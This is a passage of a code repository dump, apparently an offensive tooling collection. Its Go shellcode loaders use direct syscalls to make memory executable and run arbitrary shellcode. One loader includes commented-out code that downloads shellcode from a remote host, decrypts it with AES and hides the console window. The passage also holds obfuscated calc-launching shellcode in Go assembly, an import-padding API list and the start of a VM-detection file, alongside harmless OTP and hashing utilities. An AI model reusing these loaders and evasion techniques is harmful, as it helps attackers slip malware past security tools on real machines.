0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b, 18 | 0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18, 19 | 0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29, 20 | 0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76, 21 | 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 22 | 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57, 23 | 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f, 24 | 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24, 25 | 0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad, 26 | 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 27 | 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 28 | 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff, 29 | 0xd7, 30 | } 31 | */ 32 | //example of using bananaphone to execute shellcode in the current thread. 33 | func main() { 34 | var shellcode []byte 35 | fun := os.Args[2] 36 | //fun := "1" 37 | fileObj, err := os.Open(os.Args[1]) 38 | //fileObj, err := os.Open("loader.bin") 39 | shellcode, err = ioutil.ReadAll(fileObj) 40 | if err != nil { 41 | return 42 | } 43 | 44 | fmt.Println("Mess with the banana, die like the... banana?") //I found it easier to breakpoint the consolewrite function to mess with the in-memory ntdll to verify the auto-switch to disk works sanely than to try and live-patch it programatically. 45 | 46 | bp, e := bananaphone.NewBananaPhone(bananaphone.DiskBananaPhoneMode) 47 | if e != nil { 48 | panic(e) 49 | } 50 | //resolve the functions and extract the syscalls 51 | alloc, e := bp.GetSysID("NtAllocateVirtualMemory") 52 | if e != nil { 53 | panic(e) 54 | } 55 | prote, e := bp.GetSysID("NtProtectVirtualMemory") 56 | if e != nil { 57 | panic(e) 58 | } 59 | wr1te, e := bp.GetSysID("NtWriteVirtualMemory") 60 | if e != nil { 61 | panic(e) 62 | } 63 | cth, e := bp.GetSysID("NtCreateThreadEx") 64 | if e != nil { 65 | panic(e) 66 | } 67 | 68 | if fun == "1"{ 69 | createThread(shellcode, uintptr(0xffffffffffffffff), alloc) 70 | } 71 | if fun == "2"{ 72 | create(shellcode,uintptr(0xffffffffffffffff),prote) 73 | } 74 | if fun == "3"{ 75 | createTh(shellcode,uintptr(0xffffffffffffffff),alloc,wr1te,cth) 76 | } 77 | 78 | 79 | } 80 | 81 | func createThread(shellcode []byte, handle uintptr, NtAllocateVirtualMemorySysid uint16) { 82 | const ( 83 | //thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle. 84 | memCommit = uintptr(0x00001000) 85 | memreserve = uintptr(0x00002000) 86 | ) 87 | shellcode = append(shellcode,[]byte("0x00")[0]) 88 | var baseA uintptr 89 | regionsize := uintptr(len(shellcode)) 90 | r1, r := bananaphone.Syscall( 91 | NtAllocateVirtualMemorySysid, //ntallocatevirtualmemory 92 | handle, 93 | uintptr(unsafe.Pointer(&baseA)), 94 | 0, 95 | uintptr(unsafe.Pointer(®ionsize)), 96 | uintptr(memCommit|memreserve), 97 | syscall.PAGE_EXECUTE_READWRITE, 98 | ) 99 | if r != nil { 100 | fmt.Printf("1 %s %x\n", r, r1) 101 | return 102 | } 103 | //write memory 104 | bananaphone.WriteMemory(shellcode, baseA) 105 | 106 | syscall.Syscall(baseA, 0, 0, 0, 0) 107 | 108 | } 109 | 110 | 111 | func create(scci []byte,hand1e uintptr, prot uint16){ 112 | rawShellcode := append(scci,[]byte("0x00")[0]) 113 | //init 114 | targetPtr := func() { 115 | } 116 | var old uint32 117 | thisThread := hand1e 118 | regionsize := uintptr(len(rawShellcode)) 119 | //NtProtectVirtualMemory 120 | _, r := bananaphone.Syscall( 121 | prot, 122 | uintptr(thisThread), 123 | uintptr(unsafe.Pointer((*uintptr)(unsafe.Pointer(&targetPtr)))), 124 | uintptr((unsafe.Pointer(®ionsize))), 125 | syscall.PAGE_READWRITE, 126 | uintptr((unsafe.Pointer(&old))), 127 | ) 128 | if r != nil { 129 | return 130 | } 131 | 132 | //change addr 133 | *(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&rawShellcode)) 134 | 135 | 136 | //os.Stdout, _ = os.Open(os.DevNull) 137 | fmt.Println(len(rawShellcode)) 138 | var old0 uint32 139 | 140 | //NtProtectVirtualMemory 141 | _, r = bananaphone.Syscall( 142 | prot, 143 | uintptr(thisThread), 144 | uintptr(unsafe.Pointer((*uintptr)(unsafe.Pointer(&rawShellcode)))), 145 | uintptr((unsafe.Pointer(®ionsize))), 146 | syscall.PAGE_EXECUTE_READWRITE, 147 | uintptr((unsafe.Pointer(&old0))), 148 | ) 149 | if r != nil { 150 | return 151 | } 152 | 153 | //execute 154 | syscall.Syscall(uintptr(unsafe.Pointer(&rawShellcode[0])),0, 0, 0, 0,) 155 | } 156 | 157 | func createTh(scci []byte,hand1e uintptr, a11o,wr1te,cth uint16) { 158 | shellcode := append(scci,[]byte("0x00")[0]) 159 | const ( 160 | memCommit = uintptr(0x00001000) 161 | memreserve = uintptr(0x00002000) 162 | ) 163 | //hand1e := uintptr(windows.CurrentProcess()) //special macro that says 'use this thread/process' when provided as a handle. 164 | var baseA uintptr 165 | regionsize := uintptr(len(shellcode)) 166 | _, r := bananaphone.Syscall( 167 | a11o, //Ntallocatevirtualmemory 168 | hand1e, 169 | uintptr(unsafe.Pointer(&baseA)), 170 | 0, 171 | uintptr(unsafe.Pointer(®ionsize)), 172 | uintptr(memCommit|memreserve), 173 | syscall.PAGE_EXECUTE_READWRITE, 174 | ) 175 | if r != nil { 176 | return 177 | } 178 | //NtWriteVirtualMemory 179 | _, r = bananaphone.Syscall( 180 | wr1te, //NtWriteVirtualMemory 181 | hand1e, 182 | baseA, 183 | uintptr(unsafe.Pointer(&shellcode[0])), 184 | regionsize, 185 | 0, 186 | ) 187 | if r != nil { 188 | return 189 | } 190 | var hhosthread uintptr 191 | _, r = bananaphone.Syscall( 192 | cth, //NtCreateThreadEx 193 | uintptr(unsafe.Pointer(&hhosthread)), //hthread 194 | 0x1FFFFF, //desiredaccess 195 | 0, //objattributes 196 | hand1e, //processhandle 197 | baseA, //lpstartaddress 198 | 0, //lpparam 199 | uintptr(0), //createsuspended 200 | 0, //zerobits 201 | 0, //sizeofstackcommit 202 | 0, //sizeofstackreserve 203 | 0, //lpbytesbuffer 204 | ) 205 | syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff) 206 | if r != nil { 207 | return 208 | } 209 | } 210 | 211 | -------------------------------------------------------------------------------- /loader_tmp.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "fmt" 7 | "golang.org/x/sys/windows/registry" 8 | "io/ioutil" 9 | "os" 10 | "strconv" 11 | "syscall" 12 | "unsafe" 13 | ) 14 | 15 | 16 | func NtProtectVirtualMemory(callid uint16, argh ...uintptr) (errcode uint32, err error) 17 | var verCode uint16 18 | 19 | func getWinver() { 20 | regOpen, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) 21 | winVer, _, _ := regOpen.GetStringValue("CurrentVersion") 22 | majorNum, _, err := regOpen.GetIntegerValue("CurrentMajorVersionNumber") 23 | if err == nil{ 24 | minorNum, _, _ := regOpen.GetIntegerValue("CurrentMinorVersionNumber") 25 | winVer = strconv.FormatUint(majorNum, 10) + "." + strconv.FormatUint(minorNum, 10) 26 | } 27 | defer regOpen.Close() 28 | fmt.Println("[+] Detected Version: " +winVer) 29 | 30 | if winVer == "10.0" { 31 | verCode = 0x50 32 | } else if winVer == "6.3" { 33 | verCode = 0x4f 34 | } else if winVer == "6.2" { 35 | verCode = 0x4e 36 | } else if winVer == "6.1" { 37 | verCode= 0x4d 38 | } 39 | } 40 | 41 | 42 | func main() { 43 | getWinver() 44 | //conWindow(false) 45 | 46 | var shellcode []byte 47 | //fun := "1" 48 | fileObj, _ := os.Open(os.Args[1]) 49 | //fileObj, err := os.Open("loader.bin") 50 | shellcode, _ = ioutil.ReadAll(fileObj) 51 | 52 | //http请求shellcode与混淆 53 | /* 54 | errflag := true 55 | var resp *http.Response 56 | var err error 57 | CL := http.Client{ 58 | Timeout: 10 * time.Second, 59 | } 60 | ip := "127.0.0.1" 61 | f := "out.jpg" 62 | port := ":443" 63 | 64 | 65 | for errflag == true { 66 | CL.Get("https://web.vortex.data.microsoft.com/collect/v1") 67 | resp, err = CL.Get("http://"+ ip +port+"/"+f) 68 | if err != nil { 69 | errflag = true 70 | }else{ 71 | if resp.StatusCode != 200 { 72 | errflag = true 73 | }else{ 74 | errflag = false 75 | } 76 | } 77 | if errflag == true { 78 | //fmt.Println("sleep") 79 | time.Sleep(5 * time.Second) 80 | } 81 | } 82 | 83 | defer resp.Body.Close() 84 | if resp.StatusCode == http.StatusOK { 85 | bodyBytes, err := ioutil.ReadAll(resp.Body) 86 | if err != nil { 87 | panic(err) 88 | } 89 | shellcode = bodyBytes 90 | } 91 | 92 | */ 93 | 94 | //exec 95 | create(shellcode,uintptr(0xffffffffffffffff)) 96 | } 97 | 98 | /* 99 | func conWindow(show bool) { 100 | getWin := syscall.NewLazyDLL("kernel32.dll").NewProc("GetConsoleWindow") 101 | showWin := syscall.NewLazyDLL("user32.dll").NewProc("ShowWindow") 102 | hwnd, _, _ := getWin.Call() 103 | if hwnd == 0 { 104 | return 105 | } 106 | if show { 107 | var SW_RESTORE uintptr = 9 108 | showWin.Call(hwnd, SW_RESTORE) 109 | } else { 110 | var SW_HIDE uintptr = 0 111 | showWin.Call(hwnd, SW_HIDE) 112 | } 113 | } 114 | */ 115 | 116 | 117 | 118 | func create(scci []byte,hand1e uintptr){ 119 | //shellcode加密 120 | //rawShellcode := decrypt(scci,[]byte("0147efd7afdba2582c78807a8207c285")) 121 | //rawShellcode = append(rawShellcode,[]byte("0x00")[0]) 122 | rawShellcode := scci 123 | 124 | //init 125 | targetPtr := func() { 126 | } 127 | 128 | var old uintptr 129 | thisThread := hand1e 130 | 131 | 132 | regionsize := uintptr(len(rawShellcode)) 133 | 134 | /* 135 | var targetPtr uintptr 136 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 137 | ntAllocateVirtualMemory := ntdll.NewProc("NtAllocateVirtualMemory") 138 | ntAllocateVirtualMemory.Call(uintptr(0xffffffffffffffff), uintptr(unsafe.Pointer(&targetPtr)), 0, uintptr(unsafe.Pointer(®ionsize)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 139 | 140 | 141 | */ 142 | 143 | 144 | //regionsize := unsafe.Sizeof(rawShellcode) 145 | 146 | /* 147 | ntdll := syscall.NewLazyDLL("ntdll") 148 | prot := ntdll.NewProc("ZwProtectVirtualMemory") 149 | 150 | 151 | //ZwProtectVirtualMemory 152 | _, _, r := prot.Call( 153 | thisThread, 154 | uintptr(unsafe.Pointer(&targetPtr)), 155 | uintptr(unsafe.Pointer(®ionsize)), 156 | syscall.PAGE_READWRITE, 157 | uintptr(unsafe.Pointer(&old))) 158 | if r.Error() != "The operation completed successfully." { 159 | return 160 | } 161 | 162 | */ 163 | 164 | r,_ := NtProtectVirtualMemory( 165 | verCode, 166 | thisThread, 167 | uintptr(unsafe.Pointer((*uintptr)(unsafe.Pointer(&targetPtr)))), 168 | uintptr(unsafe.Pointer(®ionsize)), 169 | syscall.PAGE_READWRITE, 170 | uintptr(unsafe.Pointer(&old))) 171 | if r != 0 { 172 | panic("Call to VirtualProtect failed!") 173 | } 174 | 175 | //change addr first pointer 176 | *(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&rawShellcode)) 177 | 178 | //change addr second pointer 179 | //**(**uintptr)(unsafe.Pointer(&targetPtr)) = (uintptr)(unsafe.Pointer(&rawShellcode[0])) 180 | 181 | var old0 uintptr 182 | 183 | /* 184 | //ZwProtectVirtualMemory 185 | _, _, r = prot.Call( 186 | thisThread, 187 | uintptr(unsafe.Pointer(&rawShellcode)), 188 | uintptr(unsafe.Pointer(®ionsize)), 189 | syscall.PAGE_EXECUTE_READWRITE, 190 | uintptr(unsafe.Pointer(&old0))) 191 | if r.Error() != "The operation completed successfully." { 192 | return 193 | } 194 | */ 195 | 196 | r,_ = NtProtectVirtualMemory( 197 | verCode, 198 | thisThread, 199 | uintptr(unsafe.Pointer((*uintptr)(unsafe.Pointer(&rawShellcode)))), 200 | uintptr(unsafe.Pointer(®ionsize)), 201 | syscall.PAGE_EXECUTE_READWRITE, 202 | uintptr(unsafe.Pointer(&old0))) 203 | if r != 0 { 204 | panic("Call to VirtualProtect failed!") 205 | } 206 | 207 | //execute 208 | syscall.Syscall(uintptr(unsafe.Pointer(&rawShellcode[0])),0, 0, 0, 0) 209 | 210 | //下述方式有一定概率内存报错 211 | //targetPtr() 212 | //fmt.Println("catch em") 213 | } 214 | 215 | 216 | func decrypt(ciphertext []byte, key []byte)(rawText []byte){ 217 | block, err := aes.NewCipher(key) 218 | if err != nil { 219 | panic(err) 220 | } 221 | gcm, err := cipher.NewGCM(block) 222 | if err != nil { 223 | panic(err) 224 | } 225 | nonce := ciphertext[:gcm.NonceSize()] 226 | ciphertext = ciphertext[gcm.NonceSize():] 227 | plaintext, err := gcm.Open(nil, nonce, ciphertext, nil) 228 | if err != nil { 229 | panic(err) 230 | } 231 | return plaintext 232 | } 233 | 234 | 235 | -------------------------------------------------------------------------------- /messapi.txt: -------------------------------------------------------------------------------- 1 | KERNEL32.dll.GetLastError 2 | USER32.dll.GetDlgItem 3 | KERNEL32.dll.TlsGetValue 4 | KERNEL32.dll.SetLastError 5 | dbghelp.dll.SymCleanup 6 | USER32.dll.ShowWindow 7 | KERNEL32.dll.GetCurrentProcess 8 | KERNEL32.dll.LeaveCriticalSection 9 | KERNEL32.dll.EnterCriticalSection 10 | KERNEL32.dll.CloseHandle 11 | USER32.dll.FindWindowExA 12 | GDI32.dll.MoveToEx 13 | USER32.dll.GetClassNameA 14 | PSAPI.DLL.GetPerformanceInfo 15 | USER32.dll.SetWindowPlacement 16 | KERNEL32.dll.GlobalMemoryStatusEx 17 | USER32.dll.PostMessageA 18 | PSAPI.DLL.EnumProcesses 19 | KERNEL32.dll.GetVersionExA 20 | dbghelp.dll.SymInitialize 21 | ACTIVEDS.dll.ord_9 22 | dbghelp.dll.SymEnumSymbols 23 | GDI32.dll.Rectangle 24 | USER32.dll.GetWindowPlacement 25 | dbghelp.dll.SymLoadModuleEx 26 | ADVAPI32.dll.OpenProcessToken 27 | USER32.dll.EnumDisplaySettingsA 28 | USER32.dll.SendDlgItemMessageA 29 | OLEAUT32.dll.ord_4 30 | USER32.dll.GetDC 31 | KERNEL32.dll.GetProcAddress 32 | KERNEL32.dll.lstrlenA 33 | KERNEL32.dll.GetModuleHandleA 34 | KERNEL32.dll.WideCharToMultiByte 35 | GDI32.dll.ChoosePixelFormat 36 | OLEAUT32.dll.ord_8 37 | KERNEL32.dll.MultiByteToWideChar 38 | GDI32.dll.SetPixelFormat 39 | OPENGL32.dll.wglCreateContext 40 | CreateFileA 41 | CreateFileW 42 | CloseHandle 43 | WriteFile 44 | ReadFile 45 | LoadLibraryA 46 | GetProcAddress 47 | MessageBoxA 48 | SearchMemory 49 | -------------------------------------------------------------------------------- /ntdll.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/timwhitez/Doge-Misc/d999c4f807222356916490e8d96b3e2ecf8b79f7/ntdll.txt -------------------------------------------------------------------------------- /otp.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "crypto/hmac" 7 | "crypto/sha1" 8 | "encoding/base32" 9 | "encoding/binary" 10 | "fmt" 11 | "github.com/skip2/go-qrcode" 12 | //"io" 13 | "net" 14 | "os" 15 | "strings" 16 | "time" 17 | ) 18 | 19 | var firstTime time.Time 20 | 21 | type GoogleAuth struct { 22 | } 23 | 24 | func NewGoogleAuth() *GoogleAuth { 25 | return &GoogleAuth{} 26 | } 27 | 28 | func (this *GoogleAuth) un() int64 { 29 | return firstTime.UnixNano() / 1000 / 30 30 | } 31 | 32 | func (this *GoogleAuth) hmacSha1(key, data []byte) []byte { 33 | h := hmac.New(sha1.New, key) 34 | if total := len(data); total > 0 { 35 | h.Write(data) 36 | } 37 | return h.Sum(nil) 38 | } 39 | 40 | func (this *GoogleAuth) base32encode(src []byte) string { 41 | return base32.StdEncoding.EncodeToString(src) 42 | } 43 | 44 | func (this *GoogleAuth) base32decode(s string) ([]byte, error) { 45 | return base32.StdEncoding.DecodeString(s) 46 | } 47 | 48 | func (this *GoogleAuth) toBytes(value int64) []byte { 49 | var result []byte 50 | mask := int64(0xFF) 51 | shifts := [8]uint16{56, 48, 40, 32, 24, 16, 8, 0} 52 | for _, shift := range shifts { 53 | result = append(result, byte((value>>shift)&mask)) 54 | } 55 | return result 56 | } 57 | 58 | func (this *GoogleAuth) toUint32(bts []byte) uint32 { 59 | return (uint32(bts[0]) << 24) + (uint32(bts[1]) << 16) + 60 | (uint32(bts[2]) << 8) + uint32(bts[3]) 61 | } 62 | 63 | func (this *GoogleAuth) oneTimePassword(key []byte, data []byte) uint32 { 64 | hash := this.hmacSha1(key, data) 65 | offset := hash[len(hash)-1] & 0x0F 66 | hashParts := hash[offset : offset+4] 67 | hashParts[0] = hashParts[0] & 0x7F 68 | number := this.toUint32(hashParts) 69 | return number % 1000000 70 | } 71 | 72 | // 获取秘钥 73 | func (this *GoogleAuth) GetSecret() string { 74 | var buf bytes.Buffer 75 | binary.Write(&buf, binary.BigEndian, this.un()) 76 | return strings.ToUpper(this.base32encode(this.hmacSha1(buf.Bytes(), nil))) 77 | } 78 | 79 | // 获取动态码 80 | func (this *GoogleAuth) GetCode(secret string) (string, error) { 81 | secretUpper := strings.ToUpper(secret) 82 | secretKey, err := this.base32decode(secretUpper) 83 | if err != nil { 84 | return "", err 85 | } 86 | number := this.oneTimePassword(secretKey, this.toBytes(firstTime.Unix()/30)) 87 | return fmt.Sprintf("%06d", number), nil 88 | 89 | } 90 | 91 | // 获取动态码二维码内容 92 | func (this *GoogleAuth) GetQrcode(user, secret string) string { 93 | return fmt.Sprintf("otpauth://totp/%s?secret=%s", user, secret) 94 | } 95 | 96 | // 验证动态码 97 | func (this *GoogleAuth) VerifyCode(secret, code string) (bool, error) { 98 | _code, err := this.GetCode(secret) 99 | fmt.Println(_code, code) 100 | if err != nil { 101 | return false, err 102 | } 103 | return _code == code, nil 104 | } 105 | 106 | var err error 107 | 108 | type ntp_struct struct { 109 | FirstByte, A, B, C uint8 110 | D, E, F uint32 111 | G, H uint64 112 | ReceiveTime uint64 113 | J uint64 114 | } 115 | 116 | var addrs = []string{ 117 | "ntp.aliyun.com:123", 118 | "cn.ntp.org.cn:123", 119 | "time.asia.apple.com:123", 120 | "ntp.neu.edu.cn:123", 121 | "time1.cloud.tencent.com:123", 122 | "ntp1.aliyun.com:123", 123 | "time3.cloud.tencent.com:123", 124 | "ntp4.aliyun.com:123", 125 | } 126 | 127 | func getNTPTime(addr string) (time.Time,error) { 128 | // "ntp1.aliyun.com:123" "cn.ntp.org.cn:123" 129 | sock, _ := net.Dial("udp", addr) 130 | if sock == nil { 131 | return time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC),err 132 | } 133 | _ = sock.SetDeadline(time.Now().Add(2 * time.Second)) 134 | defer func() { _ = sock.Close() }() 135 | ntp_transmit := new(ntp_struct) 136 | ntp_transmit.FirstByte = 0x1b 137 | 138 | _ = binary.Write(sock, binary.BigEndian, ntp_transmit) 139 | _ = binary.Read(sock, binary.BigEndian, ntp_transmit) 140 | return time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration((ntp_transmit.ReceiveTime >> 32) * 1000000000)),nil 141 | } 142 | 143 | 144 | func main() { 145 | for _,i := range addrs{ 146 | firstTime,err = getNTPTime(i) 147 | if err == nil{ 148 | break 149 | } 150 | } 151 | 152 | if len(os.Args)== 3 { 153 | if os.Args[1] == "init" { 154 | fmt.Println("-----------------开启二次认证----------------------") 155 | //user := "otpTest123" 156 | secret, code := initAuth(os.Args[2]) 157 | fmt.Println(secret, code) 158 | return 159 | }else { 160 | fmt.Println("-----------------信息校验----------------------") 161 | secret := os.Args[1] 162 | code := os.Args[2] 163 | // secret最好持久化保存在 164 | // 验证,动态码(从谷歌验证器获取或者freeotp获取) 165 | 166 | bool, _ := NewGoogleAuth().VerifyCode(secret, code) 167 | if bool { 168 | fmt.Println("√") 169 | } else { 170 | fmt.Println("X") 171 | } 172 | return 173 | } 174 | } 175 | 176 | fmt.Println("init: otp.exe init username") 177 | fmt.Println("verity: otp.exe secret code") 178 | os.Exit(0) 179 | } 180 | 181 | // 开启二次认证 182 | func initAuth(user string) (secret, code string) { 183 | // 秘钥 184 | secret = NewGoogleAuth().GetSecret() 185 | fmt.Println("Secret:", secret) 186 | 187 | // 动态码(每隔30s会动态生成一个6位数的数字) 188 | code, _ = NewGoogleAuth().GetCode(secret) 189 | fmt.Println("Code:", code) 190 | 191 | // 用户名 192 | qrCode := NewGoogleAuth().GetQrcode(user, secret) 193 | fmt.Println("Qrcode", qrCode) 194 | 195 | // 打印二维码地址 196 | qrcode.WriteFile(qrCode,qrcode.Medium,256,"qrcode_"+user+".png") 197 | filepath := "secret_"+user+".txt" 198 | write(filepath,secret) 199 | return 200 | } 201 | 202 | 203 | func checkFileIsExist(filename string) bool { 204 | if _, err := os.Stat(filename); os.IsNotExist(err) { 205 | return false 206 | } 207 | return true 208 | } 209 | func write(filename,secret string) { 210 | var writeString = secret + "\n" 211 | var f *os.File 212 | if checkFileIsExist(filename) { //如果文件存在 213 | f, _ = os.OpenFile(filename, os.O_APPEND, 0666) //打开文件 214 | //fmt.Println("文件存在") 215 | } else { 216 | f, _ = os.Create(filename) //创建文件 217 | //fmt.Println("文件不存在") 218 | } 219 | defer f.Close() 220 | w := bufio.NewWriter(f) //创建新的 Writer 对象 221 | w.WriteString(writeString) 222 | w.Flush() 223 | //fmt.Printf("写入 %d 个字节n", n) 224 | } -------------------------------------------------------------------------------- /popcalcASM/asm.s: -------------------------------------------------------------------------------- 1 | //func scode() 2 | TEXT ·scode(SB), $0 3 | BYTE $0x90 4 | //添加垃圾跳转 5 | XORQ R11,R11 6 | MOVQ $0x2,R12 7 | j3: 8 | CMPL R11,R12 9 | JNE j4 10 | 11 | 12 | //需要执行的代码段 13 | 14 | XORQ R12,R12 15 | j4: 16 | XORQ R13,R13 17 | MOVQ $0x2,R11 18 | CMPL R13,R12 19 | JNE j3 20 | 21 | BYTE $0x50 22 | BYTE $0x51 23 | BYTE $0x52 24 | BYTE $0x53 25 | BYTE $0x56 26 | BYTE $0x57 27 | BYTE $0x55 28 | BYTE $0x54 29 | BYTE $0x58 30 | BYTE $0x66 31 | BYTE $0x83 32 | BYTE $0xe4 33 | BYTE $0xf0 34 | BYTE $0x50 35 | BYTE $0x6a 36 | BYTE $0x60 37 | BYTE $0x5a 38 | BYTE $0x68 39 | BYTE $0x63 40 | BYTE $0x61 41 | BYTE $0x6c 42 | BYTE $0x63 43 | BYTE $0x54 44 | BYTE $0x59 45 | BYTE $0x48 46 | BYTE $0x29 47 | BYTE $0xd4 48 | BYTE $0x65 49 | BYTE $0x48 50 | BYTE $0x8b 51 | BYTE $0x32 52 | BYTE $0x48 53 | BYTE $0x8b 54 | BYTE $0x76 55 | BYTE $0x18 56 | BYTE $0x48 57 | BYTE $0x8b 58 | BYTE $0x76 59 | BYTE $0x10 60 | BYTE $0x48 61 | BYTE $0xad 62 | BYTE $0x48 63 | BYTE $0x8b 64 | BYTE $0x30 65 | BYTE $0x48 66 | BYTE $0x8b 67 | BYTE $0x7e 68 | BYTE $0x30 69 | BYTE $0x3 70 | BYTE $0x57 71 | BYTE $0x3c 72 | BYTE $0x8b 73 | BYTE $0x5c 74 | BYTE $0x17 75 | BYTE $0x28 76 | BYTE $0x8b 77 | BYTE $0x74 78 | BYTE $0x1f 79 | BYTE $0x20 80 | BYTE $0x48 81 | BYTE $0x1 82 | BYTE $0xfe 83 | BYTE $0x8b 84 | BYTE $0x54 85 | BYTE $0x1f 86 | BYTE $0x24 87 | BYTE $0xf 88 | BYTE $0xb7 89 | BYTE $0x2c 90 | BYTE $0x17 91 | BYTE $0x8d 92 | BYTE $0x52 93 | BYTE $0x2 94 | BYTE $0xad 95 | BYTE $0x81 96 | BYTE $0x3c 97 | BYTE $0x7 98 | BYTE $0x57 99 | BYTE $0x69 100 | BYTE $0x6e 101 | BYTE $0x45 102 | BYTE $0x75 103 | BYTE $0xef 104 | BYTE $0x8b 105 | BYTE $0x74 106 | BYTE $0x1f 107 | BYTE $0x1c 108 | BYTE $0x48 109 | BYTE $0x1 110 | BYTE $0xfe 111 | BYTE $0x8b 112 | BYTE $0x34 113 | BYTE $0xae 114 | BYTE $0x48 115 | BYTE $0x1 116 | BYTE $0xf7 117 | BYTE $0x99 118 | BYTE $0xff 119 | BYTE $0xd7 120 | BYTE $0x48 121 | BYTE $0x83 122 | BYTE $0xc4 123 | BYTE $0x68 124 | BYTE $0x5c 125 | BYTE $0x5d 126 | BYTE $0x5f 127 | BYTE $0x5e 128 | BYTE $0x5b 129 | BYTE $0x5a 130 | BYTE $0x59 131 | BYTE $0x58 132 | BYTE $0xc3 133 | RET 134 | -------------------------------------------------------------------------------- /popcalcASM/go.mod: -------------------------------------------------------------------------------- 1 | module popcalc 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /popcalcASM/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | 4 | func main(){ 5 | scode() 6 | } 7 | 8 | 9 | func scode() 10 | -------------------------------------------------------------------------------- /ptr2list.go: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | func Ptr2List(ptr uintptr) []interface{} { 5 | return (*[0xffff]interface{})(unsafe.Pointer(ptr))[:] 6 | } 7 | -------------------------------------------------------------------------------- /sha.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/sha1" 5 | "crypto/sha256" 6 | "encoding/hex" 7 | "fmt" 8 | "github.com/gogf/gf/v2/util/gconv" 9 | ) 10 | 11 | func main(){ 12 | fmt.Println("sha1Encrypt") 13 | fmt.Println("sha1test") 14 | fmt.Println(sha1Encrypt("sha1test")) 15 | 16 | fmt.Println("str2sha1") 17 | fmt.Println("sha1test") 18 | fmt.Println(str2sha1("sha1test")) 19 | 20 | fmt.Println("sha256Encrypt") 21 | fmt.Println("sha256test") 22 | fmt.Println(sha256Encrypt("sha256test")) 23 | 24 | 25 | fmt.Println("Sha256Hex") 26 | fmt.Println("sha256test") 27 | fmt.Println(str2sha256("sha256test")) 28 | 29 | } 30 | 31 | 32 | // Encrypt encrypts any type of variable using SHA1 algorithms. 33 | // It uses package gconv to convert `v` to its bytes type. 34 | func sha1Encrypt(v interface{}) string { 35 | r := sha1.Sum(gconv.Bytes(v)) 36 | return hex.EncodeToString(r[:]) 37 | } 38 | 39 | // Encrypt encrypts any type of variable using SHA1 algorithms. 40 | // It uses package gconv to convert `v` to its bytes type. 41 | func sha256Encrypt(v interface{}) string { 42 | digest:=sha256.New() 43 | digest.Write(gconv.Bytes(v)) 44 | r := digest.Sum(nil) 45 | return hex.EncodeToString(r[:]) 46 | } 47 | 48 | 49 | 50 | func str2sha1(s string) string{ 51 | h := sha1.New() 52 | h.Write([]byte(s)) 53 | bs := h.Sum(nil) 54 | return fmt.Sprintf("%x", bs) 55 | } 56 | 57 | 58 | func str2sha256(s string)string{ 59 | digest:=sha256.New() 60 | digest.Write([]byte(s)) 61 | return hex.EncodeToString(digest.Sum(nil)) 62 | } -------------------------------------------------------------------------------- /vm_detect.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | using namespace std; 7 | 8 | int detected = 0; 9 | 10 | DWORD GetModulePath(HINSTANCE hInst,LPTSTR pszBuffer,DWORD dwSize) 11 | { 12 | DWORD dwLength = GetModuleFileName(hInst,pszBuffer,dwSize); 13 | 14 | if(dwLength) 15 | { 16 | while(dwLength && pszBuffer[ dwLength ] != _T('\\')) 17 | { 18 | dwLength--; 19 | } 20 | if(dwLength) 21 | { 22 | pszBuffer[ dwLength + 1 ] = _T('\000'); 23 | } 24 | } 25 | return dwLength; 26 | } 27 | 28 | BOOL IsProcessRunning(const string szExeName) 29 | { 30 | PROCESSENTRY32 pce = {sizeof(PROCESSENTRY32)}; 31 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0); 32 | 33 | if(Process32First(hSnapshot, &pce)) 34 | { 35 | do 36 | { 37 | if(!strcmp((const char*)pce.szExeFile, (const char*)szExeName.c_str())) 38 | { 39 | return 1; 40 | } 41 | }while( Process32Next(hSnapshot, &pce) ); 42 | 43 | } 44 | 45 | return 0; 46 | } 47 | 48 | BOOL IsUsername(const string comp) 49 | { 50 | char username[30]; 51 | DWORD nSize; 52 | 53 | nSize = sizeof(username); 54 | GetUserName(username, &nSize); 55 | 56 | if(strcmp(username,comp.c_str()) == 0) 57 | { 58 | return 1; 59 | } 60 | return 0; 61 | } 62 | 63 | BOOL IsFileInFolder(const char* filefold) 64 | { 65 | char buff[255]; 66 | 67 | GetModuleFileName(0,buff,255); 68 | 69 | if (strstr(buff, filefold)) 70 | { 71 | return 1; 72 | } 73 | 74 | return 